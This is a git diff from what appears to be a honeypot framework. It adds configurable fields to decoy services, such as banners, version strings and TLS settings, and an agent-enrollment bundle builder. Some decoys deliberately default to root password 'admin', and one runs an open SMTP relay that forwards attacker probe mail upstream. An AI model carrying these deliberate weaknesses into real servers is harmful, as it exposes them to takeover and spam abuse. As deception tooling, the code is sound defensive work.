placeholder='{"X-Powered-By": "PHP/7.4.3"}',
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="custom_body",
|
||||||
|
label="Custom response body",
|
||||||
|
type="textarea",
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
decky_name: str,
|
decky_name: str,
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
import json
|
import json
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "https"
|
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "https"
|
||||||
|
|
||||||
@@ -10,6 +10,57 @@ class HTTPSService(BaseService):
|
|||||||
ports = [443]
|
ports = [443]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="server_header",
|
||||||
|
label="Server header",
|
||||||
|
type="string",
|
||||||
|
placeholder="nginx/1.18.0",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="response_code",
|
||||||
|
label="Default response code",
|
||||||
|
type="int",
|
||||||
|
default=200,
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="fake_app",
|
||||||
|
label="Fake application",
|
||||||
|
type="enum",
|
||||||
|
enum=["none", "wordpress", "phpmyadmin", "tomcat", "jenkins"],
|
||||||
|
default="none",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="extra_headers",
|
||||||
|
label="Extra headers (JSON or raw)",
|
||||||
|
type="textarea",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="custom_body",
|
||||||
|
label="Custom response body",
|
||||||
|
type="textarea",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="tls_cn",
|
||||||
|
label="TLS certificate CN",
|
||||||
|
type="string",
|
||||||
|
placeholder="mail.corp.local",
|
||||||
|
help="Common Name baked into the self-signed cert if no cert/key provided.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="tls_cert",
|
||||||
|
label="TLS certificate (PEM)",
|
||||||
|
type="textarea",
|
||||||
|
secret=True,
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="tls_key",
|
||||||
|
label="TLS private key (PEM)",
|
||||||
|
type="textarea",
|
||||||
|
secret=True,
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
decky_name: str,
|
decky_name: str,
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class IMAPService(BaseService):
|
|||||||
name = "imap"
|
name = "imap"
|
||||||
ports = [143, 993]
|
ports = [143, 993]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class KubernetesAPIService(BaseService):
|
|||||||
name = "k8s"
|
name = "k8s"
|
||||||
ports = [6443, 8080]
|
ports = [6443, 8080]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class LDAPService(BaseService):
|
|||||||
name = "ldap"
|
name = "ldap"
|
||||||
ports = [389, 636]
|
ports = [389, 636]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -15,6 +15,7 @@ class LLMNRService(BaseService):
|
|||||||
name = "llmnr"
|
name = "llmnr"
|
||||||
ports = [5355, 5353]
|
ports = [5355, 5353]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class MongoDBService(BaseService):
|
|||||||
name = "mongodb"
|
name = "mongodb"
|
||||||
ports = [27017]
|
ports = [27017]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class MQTTService(BaseService):
|
|||||||
name = "mqtt"
|
name = "mqtt"
|
||||||
ports = [1883]
|
ports = [1883]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class MSSQLService(BaseService):
|
|||||||
name = "mssql"
|
name = "mssql"
|
||||||
ports = [1433]
|
ports = [1433]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -1,5 +1,5 @@
|
|||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "mysql"
|
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "mysql"
|
||||||
|
|
||||||
@@ -9,6 +9,16 @@ class MySQLService(BaseService):
|
|||||||
ports = [3306]
|
ports = [3306]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="version",
|
||||||
|
label="Advertised MySQL version",
|
||||||
|
type="string",
|
||||||
|
placeholder="8.0.36",
|
||||||
|
help="Sets the version banner the fake MySQL handshake reports.",
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
decky_name: str,
|
decky_name: str,
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class POP3Service(BaseService):
|
|||||||
name = "pop3"
|
name = "pop3"
|
||||||
ports = [110, 995]
|
ports = [110, 995]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class PostgresService(BaseService):
|
|||||||
name = "postgres"
|
name = "postgres"
|
||||||
ports = [5432]
|
ports = [5432]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -1,5 +1,5 @@
|
|||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "rdp"
|
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "rdp"
|
||||||
|
|
||||||
@@ -9,6 +9,19 @@ class RDPService(BaseService):
|
|||||||
ports = [3389]
|
ports = [3389]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="nla",
|
||||||
|
label="Enable CredSSP / NLA",
|
||||||
|
type="bool",
|
||||||
|
default=False,
|
||||||
|
help=(
|
||||||
|
"Off by default — basic X.224 cookie capture is enough for most "
|
||||||
|
"attacker traffic and avoids the openssl cert-gen at container start."
|
||||||
|
),
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
"build": {"context": str(TEMPLATES_DIR)},
|
"build": {"context": str(TEMPLATES_DIR)},
|
||||||
|
|||||||
@@ -1,5 +1,5 @@
|
|||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "redis"
|
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "redis"
|
||||||
|
|
||||||
@@ -9,6 +9,23 @@ class RedisService(BaseService):
|
|||||||
ports = [6379]
|
ports = [6379]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="version",
|
||||||
|
label="Advertised Redis version",
|
||||||
|
type="string",
|
||||||
|
placeholder="7.2.4",
|
||||||
|
help="Reported by INFO server -> redis_version.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="os_string",
|
||||||
|
label="Advertised OS string",
|
||||||
|
type="string",
|
||||||
|
placeholder="Linux 5.15.0 x86_64",
|
||||||
|
help="Reported by INFO server -> os.",
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
decky_name: str,
|
decky_name: str,
|
||||||
|
|||||||
@@ -28,7 +28,7 @@ def _load_plugins() -> None:
|
|||||||
for cls in BaseService.__subclasses__():
|
for cls in BaseService.__subclasses__():
|
||||||
if not cls.__module__.startswith("decnet.services."):
|
if not cls.__module__.startswith("decnet.services."):
|
||||||
continue
|
continue
|
||||||
instance = cls()
|
instance = cls() # type: ignore[abstract]
|
||||||
_registry[instance.name] = instance
|
_registry[instance.name] = instance
|
||||||
_loaded = True
|
_loaded = True
|
||||||
|
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class SIPService(BaseService):
|
|||||||
name = "sip"
|
name = "sip"
|
||||||
ports = [5060]
|
ports = [5060]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class SMBService(BaseService):
|
|||||||
name = "smb"
|
name = "smb"
|
||||||
ports = [445, 139]
|
ports = [445, 139]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
import os
|
import os
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
|
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "smtp"
|
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "smtp"
|
||||||
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
||||||
@@ -16,6 +16,24 @@ class SMTPService(BaseService):
|
|||||||
ports = [25, 587]
|
ports = [25, 587]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="banner",
|
||||||
|
label="SMTP greeting banner",
|
||||||
|
type="string",
|
||||||
|
placeholder="mail.corp.local ESMTP Postfix",
|
||||||
|
help="First line returned on TCP connect (220 ...).",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="mta",
|
||||||
|
label="MTA persona",
|
||||||
|
type="enum",
|
||||||
|
enum=["postfix", "exim", "sendmail"],
|
||||||
|
default="postfix",
|
||||||
|
help="Shapes EHLO capability list and error wording.",
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
decky_name: str,
|
decky_name: str,
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
import os
|
import os
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
|
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
# Reuses the same template as the smtp service — only difference is
|
# Reuses the same template as the smtp service — only difference is
|
||||||
# SMTP_OPEN_RELAY=1 in the environment, which enables the open relay persona.
|
# SMTP_OPEN_RELAY=1 in the environment, which enables the open relay persona.
|
||||||
@@ -18,6 +18,64 @@ class SMTPRelayService(BaseService):
|
|||||||
ports = [25, 587]
|
ports = [25, 587]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="banner",
|
||||||
|
label="SMTP greeting banner",
|
||||||
|
type="string",
|
||||||
|
placeholder="mail.corp.local ESMTP Postfix",
|
||||||
|
help="First line returned on TCP connect (220 ...).",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="mta",
|
||||||
|
label="MTA persona",
|
||||||
|
type="enum",
|
||||||
|
enum=["postfix", "exim", "sendmail"],
|
||||||
|
default="postfix",
|
||||||
|
help="Shapes EHLO capability list and error wording.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="upstream_host",
|
||||||
|
label="Upstream relay host",
|
||||||
|
type="string",
|
||||||
|
placeholder="smtp.sendgrid.net",
|
||||||
|
help="Real SMTP relay used to forward probe emails. Leave blank to disable forwarding.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="upstream_port",
|
||||||
|
label="Upstream relay port",
|
||||||
|
type="int",
|
||||||
|
default=25,
|
||||||
|
help="Port on the upstream relay (25 or 587).",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="upstream_user",
|
||||||
|
label="Upstream relay username",
|
||||||
|
type="string",
|
||||||
|
help="AUTH username for the upstream relay (optional).",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="upstream_pass",
|
||||||
|
label="Upstream relay password",
|
||||||
|
type="string",
|
||||||
|
help="AUTH password for the upstream relay (optional).",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="upstream_sender",
|
||||||
|
label="Upstream envelope sender",
|
||||||
|
type="string",
|
||||||
|
placeholder="probe@yourdomain.com",
|
||||||
|
help="Envelope MAIL FROM used when talking to the upstream relay. Set this to an address your server is authorised to send from so SPF passes at the recipient. The attacker's From: header inside the message is untouched.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="probe_limit",
|
||||||
|
label="Probe forward limit",
|
||||||
|
type="int",
|
||||||
|
default=1,
|
||||||
|
help="Number of emails per source IP to actually deliver upstream. All subsequent emails are silently quarantined.",
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
decky_name: str,
|
decky_name: str,
|
||||||
@@ -33,6 +91,7 @@ class SMTPRelayService(BaseService):
|
|||||||
"cap_add": ["NET_BIND_SERVICE"],
|
"cap_add": ["NET_BIND_SERVICE"],
|
||||||
"environment": {
|
"environment": {
|
||||||
"NODE_NAME": decky_name,
|
"NODE_NAME": decky_name,
|
||||||
|
"SMTP_SERVICE_NAME": "smtp_relay",
|
||||||
"SMTP_OPEN_RELAY": "1",
|
"SMTP_OPEN_RELAY": "1",
|
||||||
"SMTP_QUARANTINE_DIR": _IN_CONTAINER_QUARANTINE,
|
"SMTP_QUARANTINE_DIR": _IN_CONTAINER_QUARANTINE,
|
||||||
},
|
},
|
||||||
|
|||||||
@@ -16,6 +16,7 @@ class SnifferService(BaseService):
|
|||||||
name = "sniffer"
|
name = "sniffer"
|
||||||
ports: list[int] = []
|
ports: list[int] = []
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
fleet_singleton = True
|
fleet_singleton = True
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class SNMPService(BaseService):
|
|||||||
name = "snmp"
|
name = "snmp"
|
||||||
ports = [161]
|
ports = [161]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
import os
|
import os
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
|
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "ssh"
|
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "ssh"
|
||||||
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
||||||
@@ -25,6 +25,27 @@ class SSHService(BaseService):
|
|||||||
ports = [22]
|
ports = [22]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="password",
|
||||||
|
label="Root password",
|
||||||
|
type="password",
|
||||||
|
default="admin",
|
||||||
|
secret=True,
|
||||||
|
help="Plaintext root password for the in-container sshd.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="hostname",
|
||||||
|
label="Container hostname",
|
||||||
|
type="string",
|
||||||
|
help=(
|
||||||
|
"Cosmetic override for the SSH banner/PS1 — keeps the decoy "
|
||||||
|
"looking heterogeneous. Decky identity (NODE_NAME) is unaffected."
|
||||||
|
),
|
||||||
|
placeholder="e.g. mail-01.corp.local",
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
decky_name: str,
|
decky_name: str,
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
import os
|
import os
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
|
|
||||||
from decnet.services.base import BaseService
|
from decnet.services.base import BaseService, ServiceConfigField
|
||||||
|
|
||||||
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "telnet"
|
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "telnet"
|
||||||
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
||||||
@@ -24,6 +24,27 @@ class TelnetService(BaseService):
|
|||||||
ports = [23]
|
ports = [23]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
|
||||||
|
config_schema = [
|
||||||
|
ServiceConfigField(
|
||||||
|
key="password",
|
||||||
|
label="Root password",
|
||||||
|
type="password",
|
||||||
|
default="admin",
|
||||||
|
secret=True,
|
||||||
|
help="Plaintext root password for the in-container telnetd.",
|
||||||
|
),
|
||||||
|
ServiceConfigField(
|
||||||
|
key="hostname",
|
||||||
|
label="Container hostname",
|
||||||
|
type="string",
|
||||||
|
placeholder="e.g. mail-01.corp.local",
|
||||||
|
help=(
|
||||||
|
"Cosmetic override for the telnet banner — keeps decoys "
|
||||||
|
"looking heterogeneous. Decky identity (NODE_NAME) is unaffected."
|
||||||
|
),
|
||||||
|
),
|
||||||
|
]
|
||||||
|
|
||||||
def compose_fragment(
|
def compose_fragment(
|
||||||
self,
|
self,
|
||||||
decky_name: str,
|
decky_name: str,
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class TFTPService(BaseService):
|
|||||||
name = "tftp"
|
name = "tftp"
|
||||||
ports = [69]
|
ports = [69]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ class VNCService(BaseService):
|
|||||||
name = "vnc"
|
name = "vnc"
|
||||||
ports = [5900]
|
ports = [5900]
|
||||||
default_image = "build"
|
default_image = "build"
|
||||||
|
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
|
||||||
|
|
||||||
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
|
||||||
fragment: dict = {
|
fragment: dict = {
|
||||||
|
|||||||
209
decnet/swarm/bundle_builder.py
Normal file
209
decnet/swarm/bundle_builder.py
Normal file
@@ -0,0 +1,209 @@
|
|||||||
|
"""Tarball + bootstrap construction for agent-enrollment bundles.
|
||||||
|
|
||||||
|
Pure I/O, no FastAPI dependency — independently testable.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import io
|
||||||
|
import os
|
||||||
|
import pathlib
|
||||||
|
import tarfile
|
||||||
|
from datetime import datetime, timezone
|
||||||
|
from typing import Optional
|
||||||
|
|
||||||
|
from decnet.swarm import pki
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Include / exclude manifest
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
# Explicit include list — fails closed. Stray files on the master
|
||||||
|
# (dev venvs, .env files, editor scratch) cannot leak into the bundle.
|
||||||
|
_INCLUDED_ROOT_FILES: tuple[str, ...] = ("pyproject.toml",)
|
||||||
|
_INCLUDED_DIRS: tuple[str, ...] = ("decnet",)
|
||||||
|
|
||||||
|
# Subtrees of _INCLUDED_DIRS that must NOT ship (relative to repo root).
|
||||||
|
# * decnet/web — FastAPI master app, unused on agents.
|
||||||
|
# * decnet/mutator — swarm-wide respawn scheduler, master-only.
|
||||||
|
# * decnet/profiler — rebuilds profiles against master DB, master-only.
|
||||||
|
_EXCLUDED_DECNET_SUBTREES: frozenset[str] = frozenset({
|
||||||
|
"decnet/web",
|
||||||
|
"decnet/mutator",
|
||||||
|
"decnet/profiler",
|
||||||
|
})
|
||||||
|
|
||||||
|
# Agent-side systemd units. Profiler stays master-side intentionally.
|
||||||
|
_SYSTEMD_UNITS = (
|
||||||
|
"decnet-agent", "decnet-forwarder", "decnet-engine", "decnet-updater",
|
||||||
|
"decnet-collector", "decnet-prober", "decnet-sniffer",
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Path helpers
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
def _repo_root() -> pathlib.Path:
    """Return the repository root, derived from this module's own location.

    This file sits at ``decnet/swarm/bundle_builder.py``, so the root is the
    third ancestor of the resolved module path.
    """
    module_file = pathlib.Path(__file__).resolve()
    return module_file.parents[2]
|
||||||
|
|
||||||
|
|
||||||
|
def _templates_dir() -> pathlib.Path:
    """Return the ``web/templates`` directory under this module's parent package directory."""
    package_dir = pathlib.Path(__file__).resolve().parents[1]
    return package_dir.joinpath("web", "templates")
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Filesystem walk
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
def _iter_included(root: pathlib.Path) -> list[tuple[pathlib.Path, str]]:
    """Collect ``(full_path, arcname)`` pairs for every file to bundle.

    Root-level files named in ``_INCLUDED_ROOT_FILES`` are taken when they
    exist as regular files. Each directory in ``_INCLUDED_DIRS`` is walked
    without following symlinks; ``__pycache__`` directories and the subtrees
    listed in ``_EXCLUDED_DECNET_SUBTREES`` are pruned before descent.
    Compiled ``.pyc``/``.pyo`` files and symlinked files are left out.

    The result is sorted by arcname (POSIX-style path relative to *root*).
    """
    pairs: list[tuple[pathlib.Path, str]] = [
        (root / name, name)
        for name in _INCLUDED_ROOT_FILES
        if (root / name).is_file()
    ]

    for top_level in _INCLUDED_DIRS:
        base = root / top_level
        if not base.is_dir():
            continue

        for current, subdirs, files in os.walk(base, topdown=True, followlinks=False):
            here = pathlib.Path(current)
            rel_here = here.relative_to(root).as_posix()

            # Slice-assign so os.walk sees the pruned list and never
            # descends into the directories we drop here.
            subdirs[:] = [
                name
                for name in subdirs
                if not (
                    name == "__pycache__"
                    or f"{rel_here}/{name}" in _EXCLUDED_DECNET_SUBTREES
                )
            ]

            for filename in files:
                if filename.endswith((".pyc", ".pyo")):
                    continue
                candidate = here / filename
                if not candidate.is_symlink():
                    pairs.append((candidate, f"{rel_here}/{filename}"))

    return sorted(pairs, key=lambda pair: pair[1])
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Content renderers
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
def _render_decnet_ini(
    master_host: str,
    host_uuid: str,
    use_ipvlan: bool = False,
    swarmctl_port: int = 8770,
) -> bytes:
    """Render the agent-side ``decnet.ini`` and return it as encoded bytes.

    Args:
        master_host: Value written to ``master-host`` in the ``[agent]`` section.
        host_uuid: Value written to ``host-uuid`` in the ``[agent]`` section.
        use_ipvlan: Written as ``ipvlan = true`` or ``ipvlan = false`` in ``[decnet]``.
        swarmctl_port: Value written to ``swarmctl-port`` in ``[agent]``.

    Returns:
        The INI text, every line newline-terminated, encoded with ``str.encode()``.
    """
    ipvlan_value = "true" if use_ipvlan else "false"
    lines = [
        "; Generated by DECNET agent-enrollment bundle.",
        "[decnet]",
        "mode = agent",
        "disallow-master = true",
        "log-directory = /var/log/decnet",
        f"ipvlan = {ipvlan_value}",
        "",  # blank separator between the two sections
        "[agent]",
        f"master-host = {master_host}",
        f"swarmctl-port = {swarmctl_port}",
        "swarm-syslog-port = 6514",
        "agent-port = 8765",
        "agent-dir = /etc/decnet/agent",
        "updater-dir = /etc/decnet/updater",
        f"host-uuid = {host_uuid}",
    ]
    return "".join(f"{line}\n" for line in lines).encode()
|
||||||
|
|
||||||
|
|
||||||
|
def _add_bytes(tar: tarfile.TarFile, name: str, data: bytes, mode: int = 0o644) -> None:
    """Write *data* into *tar* as a member called *name*.

    Args:
